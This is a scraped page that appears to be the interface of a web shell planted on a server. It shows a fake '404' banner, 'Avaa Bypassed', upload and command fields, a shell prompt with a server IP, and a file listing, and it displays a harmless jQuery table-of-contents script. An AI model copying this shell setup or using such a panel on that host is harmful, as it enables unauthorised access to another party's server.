404

[ Avaa Bypassed ]




Upload:

Command:

botdev@3.149.236.120: ~ $
$(function() {

  var
    toc = $('#toc').show(),
    items = $('#toc > ul').hide();

  $('#toc h3')
    .click(function() {
      if (items.is(':visible')) {
        items.animate({
          height:     'hide',
          opacity:    'hide'
        }, 300, function() {
          toc.removeClass('expandedtoc');
        });
      }
      else {
        items.animate({
          height:     'show',
          opacity:    'show'
        }, 400);
        toc.addClass('expandedtoc');
      }
    });

});

Filemanager

Name Type Size Permission Actions
css3-mediaqueries.js File 14.59 KB 0644
doctools.js File 8.94 KB 0644
jquery.js File 261.74 KB 0644
searchtools.js File 24.85 KB 0644
sidebar.js File 4.69 KB 0644
theme_extras.js File 504 B 0644
underscore.js File 52.22 KB 0644